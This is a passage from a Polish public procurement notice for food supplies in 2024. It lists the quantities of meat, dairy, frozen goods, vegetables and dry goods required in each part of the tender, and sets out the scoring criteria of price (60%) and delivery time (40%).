punktów.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej<br/>wadze.<br/>Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/>Jeżeli nie można dokonać wyboru oferty w sposób określony powyżej, zamawiający wzywa wykonawców, którzy złożyli te oferty, do<br/>złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty lub innych<br/>składanych dokumentów lub oświadczeń w tym zaoferowanej ceny.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dostawy towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE III - Mięso i wędliny: Żeberka paski mięsne świeże (nie mrożone)	kg 80<br/>Łopatka b/k świeża (nie mrożona)	kg 330<br/>Kości schabowo- karkowe świeże (nie mrożone)	kg 700<br/>Kiełbasa krakowska	kg 20<br/>Kiełbasa zwyczajna ( mięso wieprzowe min.65%)	kg 150<br/>Karczek wieprzowy b/k świeży (nie mrożony)	kg	360<br/>Schab b/k świeży (nie mrożony)	kg 480<br/>Słonina b/s	kg 50<br/>Boczek surowy	kg 15<br/>Boczek wędzony	kg 30<br/>Kaszanka	kg 40<br/>Tuszonka	kg 12<br/>Mięso mielone wieprzowe z łopatki świeże (bez dodatków )	kg 650 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15131100-6 - Produkty mięsno-wędliniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami<br/>oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Opis kryterium oceny Znaczenie (%)<br/>1. Cena 60%<br/>2. Czas dostawy towaru 40%<br/>Razem 100%<br/>Kryterium CENA [C]<br/>CENA – 60%<br/>Oferty będą oceniane przez komisję przetargową metodą punktową w skali punktowej.<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/>Cena będzie oceniana metodą punktową wg wzoru:<br/>NAJNIŻSZA CENA ZE WSZYSTKICH<br/>C = ------------------------------------------------- x 60 = ILOŚĆ PUNKTÓW<br/>CENA OFERTY BADANEJ<br/>Kryterium CZAS dostawy TOWARU (T)<br/>Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium Czas dostawy towaru.<br/>W przypadku zaoferowania przez wykonawcę czasu dostawy towaru do zmawiającego może uzyskać od 5 do 40 pkt.<br/>Zamawiający uznaje za korzystny CZAS DOSTAWY TOWARU: godziny 7:00-09:00 w dniach pracy kuchni.<br/>Wskazane godziny dostawy w tym przedziale będzie skutkowało przyznaniem 40 pkt w ramach kryterium CZAS DOSTAWY<br/>TOWARU:<br/>a) Oferta, w której zadeklarowany zostanie czas do 1 godzin od wskazanego czasu – 30 pkt<br/>b) Oferta, w której zadeklarowany zostanie czas do 2 godzin od wskazanego czasu – 20 pkt<br/>c) Oferta, w której zadeklarowany zostanie czas do 3 godzin od wskazanego czasu – 10 pkt<br/>d) Oferta, w której zadeklarowany zostanie czas do 4 godzin od wskazanego czasu – 5 pkt<br/>Łączna liczba punktów za ofertę = liczba punktów za cenę brutto (maks. 60) + liczba punktów czas dostawy towaru (maks.40)<br/>Opis sposobu obliczenia łącznej oceny ofert:<br/>Łączna ocena punktowa (Ł) oferty zostanie obliczona według formuły Ł = C + T<br/>Gdzie:<br/>C – ilość punktów przyznanych Wykonawcy w kryterium cena brutto zamówienia,<br/>T – ilość punktów przyznanych Wykonawcy w kryterium „Czas dostawy towaru”.<br/>Łączna ilość punktów oferty stanowi sumę ilości punktów przyznanych w kryterium „CENA” oraz ilości punktów przyznanych w<br/>kryterium „CZAS DOSTAWY TOWARU”.<br/>Oferta, która otrzyma największą łączną ilość punktów zostanie uznana za najkorzystniejszą. Pozostałe oferty zostaną<br/>sklasyfikowane zgodnie z uzyskaną łączną ilością punktów.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej<br/>wadze.<br/>Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/>Jeżeli nie można dokonać wyboru oferty w sposób określony powyżej, zamawiający wzywa wykonawców, którzy złożyli te oferty, do<br/>złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty lub innych<br/>składanych dokumentów lub oświadczeń w tym zaoferowanej ceny.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dostawy towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE IV - Nabiał: śmietana 18% tłuszczu, opakowanie max 1l	l	805<br/>masło 82% tłuszczu mlecznego – 200g	kg 70<br/>mleko butelka lub folia 2% – opakowanie 1l	l 50<br/>twaróg kostka półtłusty – 250g	kg 70<br/>ser żółty twardy kg 50<br/>jogurt owocowy 150 g	szt.	330 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami<br/>oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Opis kryterium oceny Znaczenie (%)<br/>1. Cena 60%<br/>2. Czas dostawy towaru 40%<br/>Razem 100%<br/>Kryterium CENA [C]<br/>CENA – 60%<br/>Oferty będą oceniane przez komisję przetargową metodą punktową w skali punktowej.<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/>Cena będzie oceniana metodą punktową wg wzoru:<br/>NAJNIŻSZA CENA ZE WSZYSTKICH<br/>C = ------------------------------------------------- x 60 = ILOŚĆ PUNKTÓW<br/>CENA OFERTY BADANEJ<br/>Kryterium CZAS dostawy TOWARU (T)<br/>Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium Czas dostawy towaru.<br/>W przypadku zaoferowania przez wykonawcę czasu dostawy towaru do zmawiającego może uzyskać od 5 do 40 pkt.<br/>Zamawiający uznaje za korzystny CZAS DOSTAWY TOWARU: godziny 7:00-09:00 w dniach pracy kuchni.<br/>Wskazane godziny dostawy w tym przedziale będzie skutkowało przyznaniem 40 pkt w ramach kryterium CZAS DOSTAWY<br/>TOWARU:<br/>a) Oferta, w której zadeklarowany zostanie czas do 1 godzin od wskazanego czasu – 30 pkt<br/>b) Oferta, w której zadeklarowany zostanie czas do 2 godzin od wskazanego czasu – 20 pkt<br/>c) Oferta, w której zadeklarowany zostanie czas do 3 godzin od wskazanego czasu – 10 pkt<br/>d) Oferta, w której zadeklarowany zostanie czas do 4 godzin od wskazanego czasu – 5 pkt<br/>Łączna liczba punktów za ofertę = liczba punktów za cenę brutto (maks. 60) + liczba punktów czas dostawy towaru (maks.40)<br/>Opis sposobu obliczenia łącznej oceny ofert:<br/>Łączna ocena punktowa (Ł) oferty zostanie obliczona według formuły Ł = C + T<br/>Gdzie:<br/>C – ilość punktów przyznanych Wykonawcy w kryterium cena brutto zamówienia,<br/>T – ilość punktów przyznanych Wykonawcy w kryterium „Czas dostawy towaru”.<br/>Łączna ilość punktów oferty stanowi sumę ilości punktów przyznanych w kryterium „CENA” oraz ilości punktów przyznanych w<br/>kryterium „CZAS DOSTAWY TOWARU”.<br/>Oferta, która otrzyma największą łączną ilość punktów zostanie uznana za najkorzystniejszą. Pozostałe oferty zostaną<br/>sklasyfikowane zgodnie z uzyskaną łączną ilością punktów.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej<br/>wadze.<br/>Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/>Jeżeli nie można dokonać wyboru oferty w sposób określony powyżej, zamawiający wzywa wykonawców, którzy złożyli te oferty, do<br/>złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty lub innych<br/>składanych dokumentów lub oświadczeń w tym zaoferowanej ceny.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dostawy towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE V – Artykuły mrożone: ćwiartka kurczaka mrożona kg 320<br/>filet z kurczaka mrożony kg 220<br/>filet z morszczuka bez skóry mrożony kg 250<br/>flaki wołowe suche mrożone 1kg kg 100<br/>brokuł mrożony – 2,5kg kg 120<br/>fasola szparagowa mrożona – 2,5kg kg 230<br/>kurczak mrożony kg 140<br/>kalafior mrożony – 2,5kg kg 180<br/>marchew kostka mrożona – 2,5kg kg 5<br/>marchew z groszkiem mrożona – 2,5kg kg 160<br/>mieszanka kompotowa mrożona – 2,5kg kg 150<br/>placki ziemniaczane mrożone – 1,5kg kg 250<br/>płat śledziowy po wiejsku – 2,5kg kg 120<br/>truskawka mrożona – 2,5kg kg 150<br/>pyzy z mięsem mrożone – 2,5kg kg 300<br/>filet śledziowy solony bez skóry kg	30<br/>włoszczyzna w słupkach (marchew, pietruszka, seler, por) – 2,5 kg kg	150 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15331170-9 - Warzywa mrożone</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15221000-3 - Ryby mrożone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami<br/>oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Opis kryterium oceny Znaczenie (%)<br/>1. Cena 60%<br/>2. Czas dostawy towaru 40%<br/>Razem 100%<br/>Kryterium CENA [C]<br/>CENA – 60%<br/>Oferty będą oceniane przez komisję przetargową metodą punktową w skali punktowej.<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/>Cena będzie oceniana metodą punktową wg wzoru:<br/>NAJNIŻSZA CENA ZE WSZYSTKICH<br/>C = ------------------------------------------------- x 60 = ILOŚĆ PUNKTÓW<br/>CENA OFERTY BADANEJ<br/>Kryterium CZAS dostawy TOWARU (T)<br/>Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium Czas dostawy towaru.<br/>W przypadku zaoferowania przez wykonawcę czasu dostawy towaru do zmawiającego może uzyskać od 5 do 40 pkt.<br/>Zamawiający uznaje za korzystny CZAS DOSTAWY TOWARU: godziny 7:00-09:00 w dniach pracy kuchni.<br/>Wskazane godziny dostawy w tym przedziale będzie skutkowało przyznaniem 40 pkt w ramach kryterium CZAS DOSTAWY<br/>TOWARU:<br/>a) Oferta, w której zadeklarowany zostanie czas do 1 godzin od wskazanego czasu – 30 pkt<br/>b) Oferta, w której zadeklarowany zostanie czas do 2 godzin od wskazanego czasu – 20 pkt<br/>c) Oferta, w której zadeklarowany zostanie czas do 3 godzin od wskazanego czasu – 10 pkt<br/>d) Oferta, w której zadeklarowany zostanie czas do 4 godzin od wskazanego czasu – 5 pkt<br/>Łączna liczba punktów za ofertę = liczba punktów za cenę brutto (maks. 60) + liczba punktów czas dostawy towaru (maks.40)<br/>Opis sposobu obliczenia łącznej oceny ofert:<br/>Łączna ocena punktowa (Ł) oferty zostanie obliczona według formuły Ł = C + T<br/>Gdzie:<br/>C – ilość punktów przyznanych Wykonawcy w kryterium cena brutto zamówienia,<br/>T – ilość punktów przyznanych Wykonawcy w kryterium „Czas dostawy towaru”.<br/>Łączna ilość punktów oferty stanowi sumę ilości punktów przyznanych w kryterium „CENA” oraz ilości punktów przyznanych w<br/>kryterium „CZAS DOSTAWY TOWARU”.<br/>Oferta, która otrzyma największą łączną ilość punktów zostanie uznana za najkorzystniejszą. Pozostałe oferty zostaną<br/>sklasyfikowane zgodnie z uzyskaną łączną ilością punktów.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej<br/>wadze.<br/>Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/>Jeżeli nie można dokonać wyboru oferty w sposób określony powyżej, zamawiający wzywa wykonawców, którzy złożyli te oferty, do<br/>złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty lub innych<br/>składanych dokumentów lub oświadczeń w tym zaoferowanej ceny.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dostawy towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE VI – Warzywa i owoce: banan	kg	60<br/>burak czerwony	kg	400<br/>cebula	kg	250<br/>czosnek główka	szt.	10<br/>fasola „Jaś”	kg	130<br/>jabłko	kg	120<br/>kapusta biała	kg	550<br/>kapusta młoda	szt.	150<br/>kapusta czerwona	kg	120<br/>kapusta pekińska kg	180<br/>kapusta kiszona	kg	650<br/>koper zielony pęczek	szt.	100<br/>natka pietruszki pęczek	szt.	100<br/>ogórek zielony	kg	120<br/>ogórek kwaszony	kg	150<br/>papryka świeża	kg	70<br/>pomidor	kg	120<br/>por	kg	200<br/>pomarańcza kg	40<br/>botwina pęczek szt.	30<br/>rzodkiewka pęczek	szt.	120<br/>sałata zielona szt.	100<br/>szczypiorek pęczek	szt.	120<br/>pieczarka	kg	250<br/>seler	kg	150<br/>marchew kg	530<br/>ziemniaki	kg	7500<br/>ziemniaki młode	kg	2000<br/>mandarynka	kg	20 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15300000-1 - Owoce, warzywa i podobne produkty</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami<br/>oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Opis kryterium oceny Znaczenie (%)<br/>1. Cena 60%<br/>2. Czas dostawy towaru 40%<br/>Razem 100%<br/>Kryterium CENA [C]<br/>CENA – 60%<br/>Oferty będą oceniane przez komisję przetargową metodą punktową w skali punktowej.<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/>Cena będzie oceniana metodą punktową wg wzoru:<br/>NAJNIŻSZA CENA ZE WSZYSTKICH<br/>C = ------------------------------------------------- x 60 = ILOŚĆ PUNKTÓW<br/>CENA OFERTY BADANEJ<br/>Kryterium CZAS dostawy TOWARU (T)<br/>Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium Czas dostawy towaru.<br/>W przypadku zaoferowania przez wykonawcę czasu dostawy towaru do zmawiającego może uzyskać od 5 do 40 pkt.<br/>Zamawiający uznaje za korzystny CZAS DOSTAWY TOWARU: godziny 7:00-09:00 w dniach pracy kuchni.<br/>Wskazane godziny dostawy w tym przedziale będzie skutkowało przyznaniem 40 pkt w ramach kryterium CZAS DOSTAWY<br/>TOWARU:<br/>a) Oferta, w której zadeklarowany zostanie czas do 1 godzin od wskazanego czasu – 30 pkt<br/>b) Oferta, w której zadeklarowany zostanie czas do 2 godzin od wskazanego czasu – 20 pkt<br/>c) Oferta, w której zadeklarowany zostanie czas do 3 godzin od wskazanego czasu – 10 pkt<br/>d) Oferta, w której zadeklarowany zostanie czas do 4 godzin od wskazanego czasu – 5 pkt<br/>Łączna liczba punktów za ofertę = liczba punktów za cenę brutto (maks. 60) + liczba punktów czas dostawy towaru (maks.40)<br/>Opis sposobu obliczenia łącznej oceny ofert:<br/>Łączna ocena punktowa (Ł) oferty zostanie obliczona według formuły Ł = C + T<br/>Gdzie:<br/>C – ilość punktów przyznanych Wykonawcy w kryterium cena brutto zamówienia,<br/>T – ilość punktów przyznanych Wykonawcy w kryterium „Czas dostawy towaru”.<br/>Łączna ilość punktów oferty stanowi sumę ilości punktów przyznanych w kryterium „CENA” oraz ilości punktów przyznanych w<br/>kryterium „CZAS DOSTAWY TOWARU”.<br/>Oferta, która otrzyma największą łączną ilość punktów zostanie uznana za najkorzystniejszą. Pozostałe oferty zostaną<br/>sklasyfikowane zgodnie z uzyskaną łączną ilością punktów.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej<br/>wadze.<br/>Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/>Jeżeli nie można dokonać wyboru oferty w sposób określony powyżej, zamawiający wzywa wykonawców, którzy złożyli te oferty, do<br/>złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty lub innych<br/>składanych dokumentów lub oświadczeń w tym zaoferowanej ceny.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dostawy towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE VII – Artykuły spożywcze suche w opakowaniach garmażeryjnych: czosnek granulowany – 1kg	szt. 2<br/>przyprawa do mięs – 1kg <br/>(skład co najmniej: papryka słodka, cebula, pomidor, czosnek, papryka ostra, tymianek, pieprz czarny, rozmaryn, natka pietruszki, majeranek, oregano, mąka kukurydziana, olej rzepakowy, cukier, sól; typu Prymat lub równoważna)	szt. 1<br/>przyprawa do kurczaka – 1kg <br/>(skład co najmniej: papryka słodka, cebula, majeranek, nasiona kolendry, kurkuma, imbir, chili, kmin rzymski, gorczyca biała, kminek, goździki, cukier, sól)	szt.	1<br/>fix do gulaszu – 1kg <br/>(skład co najmniej: papryka łagodna mielona 15%, cebula 13%, koncentrat pomidorowy suszony 7,1%, mąka ryżowa, ekstrakty drożdżowe, koncentrat soku z cebuli, czosnek mielony 0,9%, syrop karmelowy, kminek, majeranek, olej słonecznikowy, sól jodowana, cukier, sól, skrobia, tłuszcz palmowy)	szt. 2<br/>galaretka – 1kg<br/>(skład co najmniej: żelatyna spożywcza wieprzowa 270 BL, cukier, kwasek cytrynowy)	szt. 140<br/>koper suszony – 0,2kg szt. 2<br/>koncentrat pomidorowy 30% – 0,9kg	szt. 170<br/>makaron świderek 100% durum – 2kg szt.	120<br/>makaron kolanko 100% durum – 2kg szt.	15, <br/>makaron rurki 100% durum – 2kg	szt. 20<br/>makaron kokardka 100% durum – 2kg szt.	15<br/>makaron nitka 100% durum – 2kg szt.	40<br/>makaron muszelka 100% durum – 2kg szt. 10<br/>natka pietruszki – 1kg	szt.	2<br/>przyprawa do zup w płynie – 1l <br/>(typu Winiary, Maggi lub równoważna)	szt. 36<br/>rosół z kury pasta – 1kg<br/>skład co najmniej: mięso kurze 1,5%, tłuszcz kurzy 5%, cebula, korzeń selera, kurkuma, pieprz biały, koncentraty soków (z marchwi, cebuli), wyciąg z rozmarynu, sól)	szt. 24<br/>sos grzybowy – 1kg szt. 1<br/>sos boloński – 1kg <br/>(skład co najmniej: koncentrat pomidorowy 36%, cebula 6,3%, czosnek, papryka, sok z buraka czerwonego, tymianek, rozmaryn, oregano, majeranek, cukier, mąka ryżowa, tłuszcz palmowy, sól jodowana, sól, syrop karmelowy, ekstrakty drożdżowe)	szt. 4<br/>zupa pieczarkowa – 1kg<br/>(skład co najmniej: sok z pieczarki 7%, pieczarki suszone 5%, warzywa suszone 3% (cebula, por, pietruszka), pieprz czarny, skrobia ziemniaczana, hydrolizat białka sojowego, odtłuszczone mleko w proszku, śmietanka w proszku pozyskiwana z mleka krowiego, skrobia ziemniaczana, mąka pszenna, sól, ekstrakt drożdżowy, kwas cytrynowy, olej rzepakowy)	szt.	1<br/>zupa ogonowa – 1kg<br/>(skład co najmniej: papryka słodka, seler, marchew, pieprz czarny, mleko w proszku, hydrolizat białka sojowego, proszek pomidorowy, sól, 